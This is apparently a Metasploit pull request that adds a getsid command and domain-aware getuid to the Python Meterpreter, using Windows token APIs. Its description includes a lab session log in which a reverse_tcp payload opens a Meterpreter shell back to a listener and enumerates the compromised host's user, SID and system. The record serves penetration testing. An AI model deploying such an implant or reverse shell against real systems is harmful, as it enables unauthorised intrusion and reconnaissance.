### PR TITLE
Add getsid to the python meterpreter

### DIFF
--- a/data/meterpreter/ext_server_stdapi.py
+++ b/data/meterpreter/ext_server_stdapi.py
@@ -215,6 +215,9 @@ if has_ctypes:
 			("wProcessorLevel", ctypes.c_uint16),
 			("wProcessorRevision", ctypes.c_uint16)]
 
+	class TOKEN_USER(ctypes.Structure):
+		_fields_ = [("User", SID_AND_ATTRIBUTES)]
+
 	#
 	# Linux Structures
 	#
@@ -364,6 +367,7 @@ TLV_TYPE_COMPUTER_NAME         = TLV_META_TYPE_STRING  | 1040
 TLV_TYPE_OS_NAME               = TLV_META_TYPE_STRING  | 1041
 TLV_TYPE_USER_NAME             = TLV_META_TYPE_STRING  | 1042
 TLV_TYPE_ARCHITECTURE          = TLV_META_TYPE_STRING  | 1043
+TLV_TYPE_SID                   = TLV_META_TYPE_STRING  | 1045
 
 ##
 # Environment
@@ -525,6 +529,36 @@ def get_stat_buffer(path):
 	st_buf += struct.pack('<II', blksize, blocks)
 	return st_buf
 
+def get_token_user(handle):
+	TOKEN_QUERY = 0x0008
+	TokenUser = 1
+	advapi32 = ctypes.windll.advapi32
+	advapi32.OpenProcessToken.argtypes = [ctypes.c_void_p, ctypes.c_uint32, ctypes.POINTER(ctypes.c_void_p)]
+
+	token_handle = ctypes.c_void_p()
+	if not advapi32.OpenProcessToken(handle, TOKEN_QUERY, ctypes.byref(token_handle)):
+		return None
+	token_user_buffer = (ctypes.c_byte * 4096)()
+	dw_returned = ctypes.c_uint32()
+	result = advapi32.GetTokenInformation(token_handle, TokenUser, ctypes.byref(token_user_buffer), ctypes.sizeof(token_user_buffer), ctypes.byref(dw_returned))
+	ctypes.windll.kernel32.CloseHandle(token_handle)
+	if not result:
+		return None
+	return cstruct_unpack(TOKEN_USER, token_user_buffer)
+
+def get_username_from_token(token_user):
+	user = (ctypes.c_char * 512)()
+	domain = (ctypes.c_char * 512)()
+	user_len = ctypes.c_uint32()
+	user_len.value = ctypes.sizeof(user)
+	domain_len = ctypes.c_uint32()
+	domain_len.value = ctypes.sizeof(domain)
+	use = ctypes.c_ulong()
+	use.value = 0
+	if not ctypes.windll.advapi32.LookupAccountSidA(None, token_user.User.Sid, user, ctypes.byref(user_len), domain, ctypes.byref(domain_len), ctypes.byref(use)):
+		return None
+	return str(ctypes.string_at(domain)) + '\\' + str(ctypes.string_at(user))
+
 def netlink_request(req_type):
 	import select
 	# See RFC 3549
@@ -633,11 +667,6 @@ def channel_open_stdapi_net_tcp_server(request, response):
 	return ERROR_SUCCESS, response
 
 @meterpreter.register_function
-def stdapi_sys_config_getuid(request, response):
-	response += tlv_pack(TLV_TYPE_USER_NAME, getpass.getuser())
-	return ERROR_SUCCESS, response
-
-@meterpreter.register_function
 def stdapi_sys_config_getenv(request, response):
 	for env_var in packet_enum_tlvs(request, TLV_TYPE_ENV_VARIABLE):
 		pgroup = ''
@@ -647,6 +676,32 @@ def stdapi_sys_config_getenv(request, response):
 			pgroup += tlv_pack(TLV_TYPE_ENV_VARIABLE, env_var)
 			pgroup += tlv_pack(TLV_TYPE_ENV_VALUE, env_val)
 			response += tlv_pack(TLV_TYPE_ENV_GROUP, pgroup)
+	return ERROR_SUCCESS, response
+
+@meterpreter.register_function_windll
+def stdapi_sys_config_getsid(request, response):
+	token = get_token_user(ctypes.windll.kernel32.GetCurrentProcess())
+	if not token:
+		return ERROR_FAILURE, response
+	sid_str = ctypes.c_char_p()
+	if not ctypes.windll.advapi32.ConvertSidToStringSidA(token.User.Sid, ctypes.byref(sid_str)):
+		return ERROR_FAILURE, response
+	sid_str = str(ctypes.string_at(sid_str))
+	response += tlv_pack(TLV_TYPE_SID, sid_str)
+	return ERROR_SUCCESS, response
+
+@meterpreter.register_function
+def stdapi_sys_config_getuid(request, response):
+	if has_windll:
+		token = get_token_user(ctypes.windll.kernel32.GetCurrentProcess())
+		if not token:
+			return ERROR_FAILURE, response
+		username = get_username_from_token(token)
+		if not username:
+			return ERROR_FAILURE, response
+	else:
+		username = getpass.getuser()
+	response += tlv_pack(TLV_TYPE_USER_NAME, username)
 	return ERROR_SUCCESS, response
 
 @meterpreter.register_function
@@ -821,26 +876,10 @@ def stdapi_sys_process_get_processes_via_windll(request, response):
 			exe_path = ctypes.string_at(exe_path)
 		else:
 			exe_path = ''
-		complete_username = ''
-		tkn_h = ctypes.c_long()
-		tkn_len = ctypes.c_uint32()
-		if ctypes.windll.advapi32.OpenProcessToken(proc_h, TOKEN_QUERY, ctypes.byref(tkn_h)):
-			ctypes.windll.advapi32.GetTokenInformation(tkn_h, TokenUser, None, 0, ctypes.byref(tkn_len))
-			buf = (ctypes.c_ubyte * tkn_len.value)()
-			if ctypes.windll.advapi32.GetTokenInformation(tkn_h, TokenUser, ctypes.byref(buf), ctypes.sizeof(buf), ctypes.byref(tkn_len)):
-				user_tkn = SID_AND_ATTRIBUTES()
-				ctypes.memmove(ctypes.byref(user_tkn), buf, ctypes.sizeof(user_tkn))
-				username = (ctypes.c_char * 512)()
-				domain = (ctypes.c_char * 512)()
-				u_len = ctypes.c_uint32()
-				u_len.value = ctypes.sizeof(username)
-				d_len = ctypes.c_uint32()
-				d_len.value = ctypes.sizeof(domain)
-				use = ctypes.c_ulong()
-				use.value = 0
-				ctypes.windll.advapi32.LookupAccountSidA(None, user_tkn.Sid, username, ctypes.byref(u_len), domain, ctypes.byref(d_len), ctypes.byref(use))
-				complete_username = str(ctypes.string_at(domain)) + '\\' + str(ctypes.string_at(username))
-			k32.CloseHandle(tkn_h)
+		process_username = ''
+		process_token_user = get_token_user(proc_h)
+		if process_token_user:
+			process_username = get_username_from_token(process_token_user)
 		parch = windll_GetNativeSystemInfo()
 		is_wow64 = ctypes.c_ubyte()
 		is_wow64.value = 0
@@ -851,7 +890,7 @@ def stdapi_sys_process_get_processes_via_windll(request, response):
 		pgroup  = bytes()
 		pgroup += tlv_pack(TLV_TYPE_PID, pe32.th32ProcessID)
 		pgroup += tlv_pack(TLV_TYPE_PARENT_PID, pe32.th32ParentProcessID)
-		pgroup += tlv_pack(TLV_TYPE_USER_NAME, complete_username)
+		pgroup += tlv_pack(TLV_TYPE_USER_NAME, process_username)
 		pgroup += tlv_pack(TLV_TYPE_PROCESS_NAME, pe32.szExeFile)
 		pgroup += tlv_pack(TLV_TYPE_PROCESS_PATH, exe_path)
 		pgroup += tlv_pack(TLV_TYPE_PROCESS_ARCH, parch)

--- a/data/meterpreter/ext_server_stdapi.py
+++ b/data/meterpreter/ext_server_stdapi.py
@@ -879,7 +879,7 @@ def stdapi_sys_process_get_processes_via_windll(request, response):
 		process_username = ''
 		process_token_user = get_token_user(proc_h)
 		if process_token_user:
-			process_username = get_username_from_token(process_token_user)
+			process_username = get_username_from_token(process_token_user) or ''
 		parch = windll_GetNativeSystemInfo()
 		is_wow64 = ctypes.c_ubyte()
 		is_wow64.value = 0


### PR DESCRIPTION
This implements `stdapi_sys_config_getsid` in the Python Meterpreter. It also changes the implementation of `stdapi_sys_config_getuid` to more closely replicate what the Windows meterpreter does. Most notably the domain is now present in the returned value.

Tested on:
- Windows XP SP3 x86 2.7
- Windows 7 SP1 x86 2.7
- Windows 7 SP1 x64 2.7
- Windows 7 SP1 x64 3.4

This PR requires #4150 to be landed first
- [x] Test the new implementation of getuid on Windows
- [x] Test the new getsid command on Windows
- [x] Verify getuid still works on non-Windows systems

Example output:

```
[*] [2014.11.08-21:06:54] Sending stage (18528 bytes) to 192.168.90.178
[*] Meterpreter session 21 opened (192.168.90.1:4444 -> 192.168.90.178:1034) at 2014-11-08 21:06:54 -0500

msf-git (S:2 J:1) payload(reverse_tcp) > sessions -i -1
[*] Starting interaction with 21...

meterpreter > getuid
Server username: NOOB-07797B4D0D\Administrator
meterpreter > getsid
Server SID: S-1-5-21-1801674531-1004336348-1417001333-500
meterpreter > sysinfo
Computer     : noob-07797b4d0d
OS           : Windows XP 5.1.2600
Architecture : x86
Meterpreter  : python/python
meterpreter > 
```
